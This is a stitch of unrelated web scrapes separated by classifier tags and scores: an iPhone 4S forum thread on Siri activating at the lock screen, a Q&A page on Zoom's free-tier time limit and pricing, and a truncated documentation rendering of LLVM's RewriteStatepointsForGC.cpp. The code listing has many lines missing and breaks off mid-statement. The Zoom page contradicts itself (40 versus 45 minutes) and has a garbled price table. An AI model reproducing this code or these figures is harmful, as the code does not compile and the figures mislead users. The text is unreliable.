Turning Siri off? Discussion in 'iPhone 4S' started by spinfreak, Oct 17, 2011. 1. spinfreak spinfreak New Member Joined: Jun 29, 2010 Messages: 31 Likes Received: 0 Trophy Points: 0 Location: Fort Lauderdale, FL I know it's possible to turn Siri off at the lock screen when using a pass code, but is it possible to turn it off at the lock screen without having a pass code enabled? I carry my phone in my pocket, and Siri has been activated numerous times now. I don't want to turn Siri off altogether, but I also don't want to have to start using a pass code. Thanks   2. spinfreak spinfreak New Member Joined: Jun 29, 2010 Messages: 31 Likes Received: 0 Trophy Points: 0 Location: Fort Lauderdale, FL Hello......anybody out there? Lol   3. Skull One Skull One Super Moderator Staff Member Joined: Apr 27, 2011 Messages: 4,421 Likes Received: 557 Trophy Points: 113 Location: Earth I actually spent five minutes trying to figure this situation out. And no, I could not find a way to overcome that issue.   4. ArmySteeler ArmySteeler New Member Joined: Oct 10, 2011 Messages: 14 Likes Received: 0 Trophy Points: 0 It is most likely that your home button is being pressed and held by some other object in your pocket. To prevent this: 1. Never place other objects in the same pocket as your iPhone. 2. Always place the screen of your iPhone towards your body when in a pocket to prevent things outside your pocket from pressing the home button. 3. Use a case which includes a cover for the front of your iPhone. Any or all of these will reduce or eliminate the problem and protect your screen from damage.   5. ArmySteeler ArmySteeler New Member Joined: Oct 10, 2011 Messages: 14 Likes Received: 0 Trophy Points: 0 It is also possible, in certain situations, Siri may activate without the home button being pressed. This can only happen if your iPhone is awake (top button has been accidentally tapped while iPhone was asleep in pocket). To prevent this, turn off the "raise to speak" setting in SETTINGS, GENERAL, SIIRI (last setting option).   6. spinfreak spinfreak New Member Joined: Jun 29, 2010 Messages: 31 Likes Received: 0 Trophy Points: 0 Location: Fort Lauderdale, FL ArmySteeler...thanks for the info, but I'm actually aware of those situations already. I was just hoping there was a way to turn Siri off completely when the phone is on the lock screen. I'm sure I'm not the only one with this issue. If there isn't a way to do this now (which there doesn't seem to be), hopefully apple will add this option in a future update.   7. iJeff iJeff New Member Joined: Jun 6, 2011 Messages: 1,612 Likes Received: 12 Trophy Points: 0 Location: Maryland i understand your issue but it would be useless if you were able to turn it off and not to mention a pain every time you go to use it and have to turn it on. Maybe you should invest in a case and carry it on your hip. Just a thought.   8. spinfreak spinfreak New Member Joined: Jun 29, 2010 Messages: 31 Likes Received: 0 Trophy Points: 0 Location: Fort Lauderdale, FL There is an option to turn it off altogether, but I'm not looking to do that. I just want it off when the phone is off (on the lock screen). I only want Siri to be able to be used when the phone is on (awake). To me, that should have been an obvious option for them to include. What's funny/weird, is that if the phone is on/awake, and you set it down with the screen facing down, Siri also activates then   Last edited: Oct 23, 2011 9. idave23 idave23 Member Joined: Oct 2, 2011 Messages: 120 Likes Received: 3 Trophy Points: 18 Mine doesn't.:confused:   10. JLadd4420 JLadd4420 New Member Joined: Oct 16, 2011 Messages: 20 Likes Received: 0 Trophy Points: 0 if Siri is activating when you set the phone down on the screen i bet you have the feature enabled for Siri to activate when you put it up to your ear, it probably doesnt recognize its on a table and not your ear.   11. f4780y f4780y Super Moderator Staff Member Joined: Apr 11, 2011 Messages: 916 Likes Received: 152 Trophy Points: 43 Location: Troon, Scotland If it is activating face down on a table it sounds like you may have an over sensitive / malfunctioning proximity sensor to me... Mine has never triggered by accident without being raised to my ear...   Share This Page Search tags for this page how do i turn off siri , how do you turn siri off , how to turn off siri , how to turn off siri on iphone , how to turn siri off , is there a way to turn siri off , turn off siri , turn off siri on iphone 4 , turn siri off , turn siri off on iphone 4
__label__pos
0.705124
Question: How Long Can I Use Zoom For Free? Is Zoom unlimited free right now? Zoom’s free tier allows people to be in a meeting for up to 40 minutes.. Why does zoom kick me out after 40 minutes? If you are using a Pro account type and you are receiving a notification that your meeting will end in x amount of minutes(timing out) you may not be logged in with the email that is associated with your Pro account. The meeting will have a 40-minute restriction. … What are the disadvantages of Zoom? Here are the cons of using Zoom:Too Many Subscriptions and Add-Ons. Zoom is a subscription-based service that is reasonably priced at starter levels. … Lack of Comment Control. … Zoombombing. … HD Video Is Not the Standard. … You Need to Download An App. … Inconsistent Cloud File Sizes. Is zoom better than Facetime? Even the free version of Zoom has much more functionality over Facetime. … HD video/audio, multiple view options, screen sharing, and 100 participant support are all included in the Zoom free plan. The only main downside with Zoom is the 40-minute limitation, but this can be fixed by paying for a subscription. Is zoom better than Skype? Zoom vs Skype are the closest competitors of their kind. They are both great options, but Zoom is the more complete solution for business users and work-related purposes. If the few extra features Zoom has over Skype don’t matter much to you, then the real difference will be in pricing. Is Zoom still free for over 40 minutes? The free version of Zoom limits the time to just 40 minutes. In order to resume the meeting, the users will either have to pay or restart it all over again. … The video conferencing platform will be removing the 40-minute limit on free Zoom accounts for all meetings globally for several upcoming special occasions. How do I see everyone on Zoom? Android | iOS Start or join a meeting. By default, the Zoom mobile app displays the Active Speaker View. If one or more participants joins the meeting, you will see a video thumbnail in the bottom-right corner. Swipe left from the active speaker view to switch to Gallery View. Is your first zoom Meeting unlimited time? Zoom offers a full-featured Basic Plan for free with unlimited meetings. … Both Basic and Pro plans allow for unlimited 1-1 meetings, each meeting can have a duration of 24 hours maximum. Your Basic plan has a 40 minutes time limit per each meeting with three or more total participants. Is Zoom still free for teachers? In response to this crisis, Zoom is lifting the meeting time restriction on free accounts. This enables robust collaboration and engagement tools for any school or district K-12. Administrators, teachers, parents and students have access to: Unlimited meetings for up to 100 participants. What is SSO in zoom? Single sign-on allows you to login using your company credentials. Zoom single sign-on (SSO) is based on SAML 2.0. … Once Zoom receives a SAML response from the Identity Provider (IdP), Zoom checks if this user exists. If the user does not exist, Zoom creates a user account automatically with the received name ID. How long can you do a free Zoom meeting? 24 hoursZoom offers a full-featured Basic Plan for free with unlimited meetings. Try Zoom for as long as you like – there is no trial period. Both Basic and Pro plans allow for unlimited 1-1 meetings, each meeting can have a duration of 24 hours maximum. How do you get around the 40 minute limit on Zoom? A Zoom Basic license only allows group meetings up to 40 minutes, but a typical course session lasts longer than that! How can instructors use Zoom to teach with that limit? The answer is simple: After meeting times out, users may restart the meeting after waiting 1 minute by just clicking on the same meeting link. What happens if you go over 40 minutes on Zoom? Meeting timeout at 40 minutes Only one person remains in the meeting. The meeting will end 40 minutes later if no one else joins. HOW MUCH IS zoom monthly? Zoom PricingNamePriceBasicFreePro$14.99per host per monthBusiness$19.99per host per monthEnterprise$19.99per host per month Is Zoom owned by Skype? But soon after lockdown was announced, Skype found itself out of sight, out of mind, replaced by an app half its age: Zoom. … To understand that, you need to go back to May 2011, when Microsoft acquired Skype for $8.5 billion. What are the disadvantages of Google meet? Google Meet Cons You can only access Meet via the Google Chrome web browser. This isn’t a huge obstacle, but it can be annoying if you use another browser. Also, it might create delays for participants who are unfamiliar with Meet. How do you get unlimited minutes on Zoom? You get [virtually] unlimited minutes on Zoom by having a host that is paying for a plan. The free plan can only host a meeting for up to 45 minutes before being disconnected. But a paid plan can host a meeting for 1440 minutes, then immediately start a new meeting that will last for another 24 hours.
__label__pos
0.97361
LLVM  10.0.0svn RewriteStatepointsForGC.cpp Go to the documentation of this file. 1 //===- RewriteStatepointsForGC.cpp - Make GC relocations explicit ---------===// 2 // 3 // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. 4 // See https://llvm.org/LICENSE.txt for license information. 5 // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception 6 // 7 //===----------------------------------------------------------------------===// 8 // 9 // Rewrite call/invoke instructions so as to make potential relocations 10 // performed by the garbage collector explicit in the IR. 11 // 12 //===----------------------------------------------------------------------===// 13  15  16 #include "llvm/ADT/ArrayRef.h" 17 #include "llvm/ADT/DenseMap.h" 18 #include "llvm/ADT/DenseSet.h" 19 #include "llvm/ADT/MapVector.h" 20 #include "llvm/ADT/None.h" 21 #include "llvm/ADT/Optional.h" 22 #include "llvm/ADT/STLExtras.h" 23 #include "llvm/ADT/SetVector.h" 24 #include "llvm/ADT/SmallSet.h" 25 #include "llvm/ADT/SmallVector.h" 26 #include "llvm/ADT/StringRef.h" 31 #include "llvm/IR/Argument.h" 32 #include "llvm/IR/Attributes.h" 33 #include "llvm/IR/BasicBlock.h" 34 #include "llvm/IR/CallingConv.h" 35 #include "llvm/IR/Constant.h" 36 #include "llvm/IR/Constants.h" 37 #include "llvm/IR/DataLayout.h" 38 #include "llvm/IR/DerivedTypes.h" 39 #include "llvm/IR/Dominators.h" 40 #include "llvm/IR/Function.h" 41 #include "llvm/IR/IRBuilder.h" 42 #include "llvm/IR/InstIterator.h" 43 #include "llvm/IR/InstrTypes.h" 44 #include "llvm/IR/Instruction.h" 45 #include "llvm/IR/Instructions.h" 46 #include "llvm/IR/IntrinsicInst.h" 47 #include "llvm/IR/Intrinsics.h" 48 #include "llvm/IR/LLVMContext.h" 49 #include "llvm/IR/MDBuilder.h" 50 #include "llvm/IR/Metadata.h" 51 #include "llvm/IR/Module.h" 52 #include "llvm/IR/Statepoint.h" 53 #include "llvm/IR/Type.h" 54 #include "llvm/IR/User.h" 55 #include "llvm/IR/Value.h" 56 #include "llvm/IR/ValueHandle.h" 57 #include "llvm/Pass.h" 58 #include "llvm/Support/Casting.h" 60 #include "llvm/Support/Compiler.h" 61 #include "llvm/Support/Debug.h" 64 #include "llvm/Transforms/Scalar.h" 68 #include <algorithm> 69 #include <cassert> 70 #include <cstddef> 71 #include <cstdint> 72 #include <iterator> 73 #include <set> 74 #include <string> 75 #include <utility> 76 #include <vector> 77  78 #define DEBUG_TYPE "rewrite-statepoints-for-gc" 79  80 using namespace llvm; 81  82 // Print the liveset found at the insert location 83 static cl::opt<bool> PrintLiveSet("spp-print-liveset", cl::Hidden, 84  cl::init(false)); 85 static cl::opt<bool> PrintLiveSetSize("spp-print-liveset-size", cl::Hidden, 86  cl::init(false)); 87  88 // Print out the base pointers for debugging 89 static cl::opt<bool> PrintBasePointers("spp-print-base-pointers", cl::Hidden, 90  cl::init(false)); 91  92 // Cost threshold measuring when it is profitable to rematerialize value instead 93 // of relocating it 94 static cl::opt<unsigned> 95 RematerializationThreshold("spp-rematerialization-threshold", cl::Hidden, 96  cl::init(6)); 97  98 #ifdef EXPENSIVE_CHECKS 99 static bool ClobberNonLive = true; 100 #else 101 static bool ClobberNonLive = false; 102 #endif 103  104 static cl::opt<bool, true> ClobberNonLiveOverride("rs4gc-clobber-non-live", 105  cl::location(ClobberNonLive), 106  cl::Hidden); 107  108 static cl::opt<bool> 109  AllowStatepointWithNoDeoptInfo("rs4gc-allow-statepoint-with-no-deopt-info", 110  cl::Hidden, cl::init(true)); 111  112 /// The IR fed into RewriteStatepointsForGC may have had attributes and 113 /// metadata implying dereferenceability that are no longer valid/correct after 114 /// RewriteStatepointsForGC has run. This is because semantically, after 115 /// RewriteStatepointsForGC runs, all calls to gc.statepoint "free" the entire 116 /// heap. stripNonValidData (conservatively) restores 117 /// correctness by erasing all attributes in the module that externally imply 118 /// dereferenceability. Similar reasoning also applies to the noalias 119 /// attributes and metadata. gc.statepoint can touch the entire heap including 120 /// noalias objects. 121 /// Apart from attributes and metadata, we also remove instructions that imply 122 /// constant physical memory: llvm.invariant.start. 123 static void stripNonValidData(Module &M); 124  126  128  ModuleAnalysisManager &AM) { 129  bool Changed = false; 130  auto &FAM = AM.getResult<FunctionAnalysisManagerModuleProxy>(M).getManager(); 131  for (Function &F : M) { 132  // Nothing to do for declarations. 133  if (F.isDeclaration() || F.empty()) 134  continue; 135  136  // Policy choice says not to rewrite - the most common reason is that we're 137  // compiling code without a GCStrategy. 139  continue; 140  141  auto &DT = FAM.getResult<DominatorTreeAnalysis>(F); 142  auto &TTI = FAM.getResult<TargetIRAnalysis>(F); 143  auto &TLI = FAM.getResult<TargetLibraryAnalysis>(F); 144  Changed |= runOnFunction(F, DT, TTI, TLI); 145  } 146  if (!Changed) 147  return PreservedAnalyses::all(); 148  149  // stripNonValidData asserts that shouldRewriteStatepointsIn 150  // returns true for at least one function in the module. Since at least 151  // one function changed, we know that the precondition is satisfied. 153  157  return PA; 158 } 159  160 namespace { 161  162 class RewriteStatepointsForGCLegacyPass : public ModulePass { 164  165 public: 166  static char ID; // Pass identification, replacement for typeid 167  168  RewriteStatepointsForGCLegacyPass() : ModulePass(ID), Impl() { 171  } 172  173  bool runOnModule(Module &M) override { 174  bool Changed = false; 175  for (Function &F : M) { 176  // Nothing to do for declarations. 177  if (F.isDeclaration() || F.empty()) 178  continue; 179  180  // Policy choice says not to rewrite - the most common reason is that 181  // we're compiling code without a GCStrategy. 183  continue; 184  185  TargetTransformInfo &TTI = 186  getAnalysis<TargetTransformInfoWrapperPass>().getTTI(F); 187  const TargetLibraryInfo &TLI = 188  getAnalysis<TargetLibraryInfoWrapperPass>().getTLI(F); 189  auto &DT = getAnalysis<DominatorTreeWrapperPass>(F).getDomTree(); 190  191  Changed |= Impl.runOnFunction(F, DT, TTI, TLI); 192  } 193  194  if (!Changed) 195  return false; 196  197  // stripNonValidData asserts that shouldRewriteStatepointsIn 198  // returns true for at least one function in the module. Since at least 199  // one function changed, we know that the precondition is satisfied. 201  return true; 202  } 203  204  void getAnalysisUsage(AnalysisUsage &AU) const override { 205  // We add and rewrite a bunch of instructions, but don't really do much 206  // else. We could in theory preserve a lot more analyses here. 210  } 211 }; 212  213 } // end anonymous namespace 214  216  218  return new RewriteStatepointsForGCLegacyPass(); 219 } 220  221 INITIALIZE_PASS_BEGIN(RewriteStatepointsForGCLegacyPass, 222  "rewrite-statepoints-for-gc", 223  "Make relocations explicit at statepoints", false, false) 226 INITIALIZE_PASS_END(RewriteStatepointsForGCLegacyPass, 227  "rewrite-statepoints-for-gc", 228  "Make relocations explicit at statepoints", false, false) 229  230 namespace { 231  233  /// Values defined in this block. 235  236  /// Values used in this block (and thus live); does not included values 237  /// killed within this block. 239  240  /// Values live into this basic block (i.e. used by any 241  /// instruction in this basic block or ones reachable from here) 243  244  /// Values live out of this basic block (i.e. live into 245  /// any successor block) 247 }; 248  249 // The type of the internal cache used inside the findBasePointers family 250 // of functions. From the callers perspective, this is an opaque type and 251 // should not be inspected. 252 // 253 // In the actual implementation this caches two relations: 254 // - The base relation itself (i.e. this pointer is based on that one) 255 // - The base defining value relation (i.e. before base_phi insertion) 256 // Generally, after the execution of a full findBasePointer call, only the 257 // base relation will remain. Internally, we add a mixture of the two 258 // types, then update all the second type to the first type 263  265  /// The set of values known to be live across this safepoint 267  268  /// Mapping from live pointers to a base-defining-value 270  271  /// The *new* gc.statepoint instruction itself. This produces the token 272  /// that normal path gc.relocates and the gc.result are tied to. 274  275  /// Instruction to which exceptional gc relocates are attached 276  /// Makes it easier to iterate through them during relocationViaAlloca. 278  279  /// Record live values we are rematerialized instead of relocating. 280  /// They are not included into 'LiveSet' field. 281  /// Maps rematerialized copy to it's original value. 283 }; 284  285 } // end anonymous namespace 286  288  Optional<OperandBundleUse> DeoptBundle = 290  291  if (!DeoptBundle.hasValue()) { 293  "Found non-leaf call without deopt info!"); 294  return None; 295  } 296  297  return DeoptBundle.getValue().Inputs; 298 } 299  300 /// Compute the live-in set for every basic block in the function 301 static void computeLiveInValues(DominatorTree &DT, Function &F, 302  GCPtrLivenessData &Data); 303  304 /// Given results from the dataflow liveness computation, find the set of live 305 /// Values at a particular instruction. 306 static void findLiveSetAtInst(Instruction *inst, GCPtrLivenessData &Data, 307  StatepointLiveSetTy &out); 308  309 // TODO: Once we can get to the GCStrategy, this becomes 310 // Optional<bool> isGCManagedPointer(const Type *Ty) const override { 311  312 static bool isGCPointerType(Type *T) { 313  if (auto *PT = dyn_cast<PointerType>(T)) 314  // For the sake of this example GC, we arbitrarily pick addrspace(1) as our 315  // GC managed heap. We know that a pointer into this heap needs to be 316  // updated and that no other pointer does. 317  return PT->getAddressSpace() == 1; 318  return false; 319 } 320  321 // Return true if this type is one which a) is a gc pointer or contains a GC 322 // pointer and b) is of a type this code expects to encounter as a live value. 323 // (The insertion code will assert that a type which matches (a) and not (b) 324 // is not encountered.) 326  // We fully support gc pointers 327  if (isGCPointerType(T)) 328  return true; 329  // We partially support vectors of gc pointers. The code will assert if it 330  // can't handle something. 331  if (auto VT = dyn_cast<VectorType>(T)) 332  if (isGCPointerType(VT->getElementType())) 333  return true; 334  return false; 335 } 336  337 #ifndef NDEBUG 338 /// Returns true if this type contains a gc pointer whether we know how to 339 /// handle that type or not. 340 static bool containsGCPtrType(Type *Ty) { 341  if (isGCPointerType(Ty)) 342  return true; 343  if (VectorType *VT = dyn_cast<VectorType>(Ty)) 344  return isGCPointerType(VT->getScalarType()); 345  if (ArrayType *AT = dyn_cast<ArrayType>(Ty)) 346  return containsGCPtrType(AT->getElementType()); 347  if (StructType *ST = dyn_cast<StructType>(Ty)) 348  return llvm::any_of(ST->elements(), containsGCPtrType); 349  return false; 350 } 351  352 // Returns true if this is a type which a) is a gc pointer or contains a GC 353 // pointer and b) is of a type which the code doesn't expect (i.e. first class 354 // aggregates). Used to trip assertions. 355 static bool isUnhandledGCPointerType(Type *Ty) { 356  return containsGCPtrType(Ty) && !isHandledGCPointerType(Ty); 357 } 358 #endif 359  360 // Return the name of the value suffixed with the provided value, or if the 361 // value didn't have a name, the default value specified. 362 static std::string suffixed_name_or(Value *V, StringRef Suffix, 363  StringRef DefaultName) { 364  return V->hasName() ? (V->getName() + Suffix).str() : DefaultName.str(); 365 } 366  367 // Conservatively identifies any definitions which might be live at the 368 // given instruction. The analysis is performed immediately before the 369 // given instruction. Values defined by that instruction are not considered 370 // live. Values used by that instruction are considered live. 372  DominatorTree &DT, GCPtrLivenessData &OriginalLivenessData, CallBase *Call, 373  PartiallyConstructedSafepointRecord &Result) { 374  StatepointLiveSetTy LiveSet; 375  findLiveSetAtInst(Call, OriginalLivenessData, LiveSet); 376  377  if (PrintLiveSet) { 378  dbgs() << "Live Variables:\n"; 379  for (Value *V : LiveSet) 380  dbgs() << " " << V->getName() << " " << *V << "\n"; 381  } 382  if (PrintLiveSetSize) { 383  dbgs() << "Safepoint For: " << Call->getCalledValue()->getName() << "\n"; 384  dbgs() << "Number live values: " << LiveSet.size() << "\n"; 385  } 386  Result.LiveSet = LiveSet; 387 } 388  389 static bool isKnownBaseResult(Value *V); 390  391 namespace { 392  393 /// A single base defining value - An immediate base defining value for an 394 /// instruction 'Def' is an input to 'Def' whose base is also a base of 'Def'. 395 /// For instructions which have multiple pointer [vector] inputs or that 396 /// transition between vector and scalar types, there is no immediate base 397 /// defining value. The 'base defining value' for 'Def' is the transitive 398 /// closure of this relation stopping at the first instruction which has no 399 /// immediate base defining value. The b.d.v. might itself be a base pointer, 400 /// but it can also be an arbitrary derived pointer. 401 struct BaseDefiningValueResult { 402  /// Contains the value which is the base defining value. 403  Value * const BDV; 404  405  /// True if the base defining value is also known to be an actual base 406  /// pointer. 407  const bool IsKnownBase; 408  409  BaseDefiningValueResult(Value *BDV, bool IsKnownBase) 410  : BDV(BDV), IsKnownBase(IsKnownBase) { 411 #ifndef NDEBUG 412  // Check consistency between new and old means of checking whether a BDV is 413  // a base. 414  bool MustBeBase = isKnownBaseResult(BDV); 415  assert(!MustBeBase || MustBeBase == IsKnownBase); 416 #endif 417  } 418 }; 419  420 } // end anonymous namespace 421  422 static BaseDefiningValueResult findBaseDefiningValue(Value *I); 423  424 /// Return a base defining value for the 'Index' element of the given vector 425 /// instruction 'I'. If Index is null, returns a BDV for the entire vector 426 /// 'I'. As an optimization, this method will try to determine when the 427 /// element is known to already be a base pointer. If this can be established, 428 /// the second value in the returned pair will be true. Note that either a 429 /// vector or a pointer typed value can be returned. For the former, the 430 /// vector returned is a BDV (and possibly a base) of the entire vector 'I'. 431 /// If the later, the return pointer is a BDV (or possibly a base) for the 432 /// particular element in 'I'. 433 static BaseDefiningValueResult 435  // Each case parallels findBaseDefiningValue below, see that code for 436  // detailed motivation. 437  438  if (isa<Argument>(I)) 439  // An incoming argument to the function is a base pointer 440  return BaseDefiningValueResult(I, true); 441  442  if (isa<Constant>(I)) 443  // Base of constant vector consists only of constant null pointers. 444  // For reasoning see similar case inside 'findBaseDefiningValue' function. 445  return BaseDefiningValueResult(ConstantAggregateZero::get(I->getType()), 446  true); 447  448  if (isa<LoadInst>(I)) 449  return BaseDefiningValueResult(I, true); 450  451  if (isa<InsertElementInst>(I)) 452  // We don't know whether this vector contains entirely base pointers or 453  // not. To be conservatively correct, we treat it as a BDV and will 454  // duplicate code as needed to construct a parallel vector of bases. 455  return BaseDefiningValueResult(I, false); 456  457  if (isa<ShuffleVectorInst>(I)) 458  // We don't know whether this vector contains entirely base pointers or 459  // not. To be conservatively correct, we treat it as a BDV and will 460  // duplicate code as needed to construct a parallel vector of bases. 461  // TODO: There a number of local optimizations which could be applied here 462  // for particular sufflevector patterns. 463  return BaseDefiningValueResult(I, false); 464  465  // The behavior of getelementptr instructions is the same for vector and 466  // non-vector data types. 467  if (auto *GEP = dyn_cast<GetElementPtrInst>(I)) 468  return findBaseDefiningValue(GEP->getPointerOperand()); 469  470  // If the pointer comes through a bitcast of a vector of pointers to 471  // a vector of another type of pointer, then look through the bitcast 472  if (auto *BC = dyn_cast<BitCastInst>(I)) 473  return findBaseDefiningValue(BC->getOperand(0)); 474  475  // We assume that functions in the source language only return base 476  // pointers. This should probably be generalized via attributes to support 477  // both source language and internal functions. 478  if (isa<CallInst>(I) || isa<InvokeInst>(I)) 479  return BaseDefiningValueResult(I, true); 480  481  // A PHI or Select is a base defining value. The outer findBasePointer 482  // algorithm is responsible for constructing a base value for this BDV. 483  assert((isa<SelectInst>(I) || isa<PHINode>(I)) && 484  "unknown vector instruction - no base found for vector element"); 485  return BaseDefiningValueResult(I, false); 486 } 487  488 /// Helper function for findBasePointer - Will return a value which either a) 489 /// defines the base pointer for the input, b) blocks the simple search 490 /// (i.e. a PHI or Select of two derived pointers), or c) involves a change 491 /// from pointer to vector type or back. 492 static BaseDefiningValueResult findBaseDefiningValue(Value *I) { 494  "Illegal to ask for the base pointer of a non-pointer type"); 495  496  if (I->getType()->isVectorTy()) 498  499  if (isa<Argument>(I)) 500  // An incoming argument to the function is a base pointer 501  // We should have never reached here if this argument isn't an gc value 502  return BaseDefiningValueResult(I, true); 503  504  if (isa<Constant>(I)) { 505  // We assume that objects with a constant base (e.g. a global) can't move 506  // and don't need to be reported to the collector because they are always 507  // live. Besides global references, all kinds of constants (e.g. undef, 508  // constant expressions, null pointers) can be introduced by the inliner or 509  // the optimizer, especially on dynamically dead paths. 510  // Here we treat all of them as having single null base. By doing this we 511  // trying to avoid problems reporting various conflicts in a form of 512  // "phi (const1, const2)" or "phi (const, regular gc ptr)". 513  // See constant.ll file for relevant test cases. 514  515  return BaseDefiningValueResult( 516  ConstantPointerNull::get(cast<PointerType>(I->getType())), true); 517  } 518  519  if (CastInst *CI = dyn_cast<CastInst>(I)) { 520  Value *Def = CI->stripPointerCasts(); 521  // If stripping pointer casts changes the address space there is an 522  // addrspacecast in between. 523  assert(cast<PointerType>(Def->getType())->getAddressSpace() == 524  cast<PointerType>(CI->getType())->getAddressSpace() && 525  "unsupported addrspacecast"); 526  // If we find a cast instruction here, it means we've found a cast which is 527  // not simply a pointer cast (i.e. an inttoptr). We don't know how to 528  // handle int->ptr conversion. 529  assert(!isa<CastInst>(Def) && "shouldn't find another cast here"); 530  return findBaseDefiningValue(Def); 531  } 532  533  if (isa<LoadInst>(I)) 534  // The value loaded is an gc base itself 535  return BaseDefiningValueResult(I, true); 536  537  if (GetElementPtrInst *GEP = dyn_cast<GetElementPtrInst>(I)) 538  // The base of this GEP is the base 539  return findBaseDefiningValue(GEP->getPointerOperand()); 540  541  if (IntrinsicInst *II = dyn_cast<IntrinsicInst>(I)) { 542  switch (II->getIntrinsicID()) { 543  default: 544  // fall through to general call handling 545  break; 546  case Intrinsic::experimental_gc_statepoint: 547  llvm_unreachable("statepoints don't produce pointers"); 548  case Intrinsic::experimental_gc_relocate: 549  // Rerunning safepoint insertion after safepoints are already 550  // inserted is not supported. It could probably be made to work, 551  // but why are you doing this? There's no good reason. 552  llvm_unreachable("repeat safepoint insertion is not supported"); 553  case Intrinsic::gcroot: 554  // Currently, this mechanism hasn't been extended to work with gcroot. 555  // There's no reason it couldn't be, but I haven't thought about the 556  // implications much. 558  "interaction with the gcroot mechanism is not supported"); 559  } 560  } 561  // We assume that functions in the source language only return base 562  // pointers. This should probably be generalized via attributes to support 563  // both source language and internal functions. 564  if (isa<CallInst>(I) || isa<InvokeInst>(I)) 565  return BaseDefiningValueResult(I, true); 566  567  // TODO: I have absolutely no idea how to implement this part yet. It's not 568  // necessarily hard, I just haven't really looked at it yet. 569  assert(!isa<LandingPadInst>(I) && "Landing Pad is unimplemented"); 570  571  if (isa<AtomicCmpXchgInst>(I)) 572  // A CAS is effectively a atomic store and load combined under a 573  // predicate. From the perspective of base pointers, we just treat it 574  // like a load. 575  return BaseDefiningValueResult(I, true); 576  577  assert(!isa<AtomicRMWInst>(I) && "Xchg handled above, all others are " 578  "binary ops which don't apply to pointers"); 579  580  // The aggregate ops. Aggregates can either be in the heap or on the 581  // stack, but in either case, this is simply a field load. As a result, 582  // this is a defining definition of the base just like a load is. 583  if (isa<ExtractValueInst>(I)) 584  return BaseDefiningValueResult(I, true); 585  586  // We should never see an insert vector since that would require we be 587  // tracing back a struct value not a pointer value. 588  assert(!isa<InsertValueInst>(I) && 589  "Base pointer for a struct is meaningless"); 590  591  // An extractelement produces a base result exactly when it's input does. 592  // We may need to insert a parallel instruction to extract the appropriate 593  // element out of the base vector corresponding to the input. Given this, 594  // it's analogous to the phi and select case even though it's not a merge. 595  if (isa<ExtractElementInst>(I)) 596  // Note: There a lot of obvious peephole cases here. This are deliberately 597  // handled after the main base pointer inference algorithm to make writing 598  // test cases to exercise that code easier. 599  return BaseDefiningValueResult(I, false); 600  601  // The last two cases here don't return a base pointer. Instead, they 602  // return a value which dynamically selects from among several base 603  // derived pointers (each with it's own base potentially). It's the job of 604  // the caller to resolve these. 605  assert((isa<SelectInst>(I) || isa<PHINode>(I)) && 606  "missing instruction case in findBaseDefiningValing"); 607  return BaseDefiningValueResult(I, false); 608 } 609  610 /// Returns the base defining value for this value. 612  Value *&Cached = Cache[I]; 613  if (!Cached) { 614  Cached = findBaseDefiningValue(I).BDV; 615  LLVM_DEBUG(dbgs() << "fBDV-cached: " << I->getName() << " -> " 616  << Cached->getName() << "\n"); 617  } 618  assert(Cache[I] != nullptr); 619  return Cached; 620 } 621  622 /// Return a base pointer for this value if known. Otherwise, return it's 623 /// base defining value. 626  auto Found = Cache.find(Def); 627  if (Found != Cache.end()) { 628  // Either a base-of relation, or a self reference. Caller must check. 629  return Found->second; 630  } 631  // Only a BDV available 632  return Def; 633 } 634  635 /// Given the result of a call to findBaseDefiningValue, or findBaseOrBDV, 636 /// is it known to be a base pointer? Or do we need to continue searching. 637 static bool isKnownBaseResult(Value *V) { 638  if (!isa<PHINode>(V) && !isa<SelectInst>(V) && 639  !isa<ExtractElementInst>(V) && !isa<InsertElementInst>(V) && 640  !isa<ShuffleVectorInst>(V)) { 641  // no recursion possible 642  return true; 643  } 644  if (isa<Instruction>(V) && 645  cast<Instruction>(V)->getMetadata("is_base_value")) { 646  // This is a previously inserted base phi or select. We know 647  // that this is a base value. 648  return true; 649  } 650  651  // We need to keep searching 652  return false; 653 } 654  655 namespace { 656  657 /// Models the state of a single base defining value in the findBasePointer 658 /// algorithm for determining where a new instruction is needed to propagate 659 /// the base of this BDV. 660 class BDVState { 661 public: 662  enum Status { Unknown, Base, Conflict }; 663  664  BDVState() : BaseValue(nullptr) {} 665  666  explicit BDVState(Status Status, Value *BaseValue = nullptr) 667  : Status(Status), BaseValue(BaseValue) { 668  assert(Status != Base || BaseValue); 669  } 670  671  explicit BDVState(Value *BaseValue) : Status(Base), BaseValue(BaseValue) {} 672  673  Status getStatus() const { return Status; } 674  Value *getBaseValue() const { return BaseValue; } 675  676  bool isBase() const { return getStatus() == Base; } 677  bool isUnknown() const { return getStatus() == Unknown; } 678  bool isConflict() const { return getStatus() == Conflict; } 679  680  bool operator==(const BDVState &Other) const { 681  return BaseValue == Other.BaseValue && Status == Other.Status; 682  } 683  684  bool operator!=(const BDVState &other) const { return !(*this == other); } 685  687  void dump() const { 688  print(dbgs()); 689  dbgs() << '\n'; 690  } 691  692  void print(raw_ostream &OS) const { 693  switch (getStatus()) { 694  case Unknown: 695  OS << "U"; 696  break; 697  case Base: 698  OS << "B"; 699  break; 700  case Conflict: 701  OS << "C"; 702  break; 703  } 704  OS << " (" << getBaseValue() << " - " 705  << (getBaseValue() ? getBaseValue()->getName() : "nullptr") << "): "; 706  } 707  708 private: 709  Status Status = Unknown; 710  AssertingVH<Value> BaseValue; // Non-null only if Status == Base. 711 }; 712  713 } // end anonymous namespace 714  715 #ifndef NDEBUG 716 static raw_ostream &operator<<(raw_ostream &OS, const BDVState &State) { 717  State.print(OS); 718  return OS; 719 } 720 #endif 721  722 static BDVState meetBDVStateImpl(const BDVState &LHS, const BDVState &RHS) { 723  switch (LHS.getStatus()) { 724  case BDVState::Unknown: 725  return RHS; 726  727  case BDVState::Base: 728  assert(LHS.getBaseValue() && "can't be null"); 729  if (RHS.isUnknown()) 730  return LHS; 731  732  if (RHS.isBase()) { 733  if (LHS.getBaseValue() == RHS.getBaseValue()) { 734  assert(LHS == RHS && "equality broken!"); 735  return LHS; 736  } 737  return BDVState(BDVState::Conflict); 738  } 739  assert(RHS.isConflict() && "only three states!"); 740  return BDVState(BDVState::Conflict); 741  742  case BDVState::Conflict: 743  return LHS; 744  } 745  llvm_unreachable("only three states!"); 746 } 747  748 // Values of type BDVState form a lattice, and this function implements the meet 749 // operation. 750 static BDVState meetBDVState(const BDVState &LHS, const BDVState &RHS) { 751  BDVState Result = meetBDVStateImpl(LHS, RHS); 752  assert(Result == 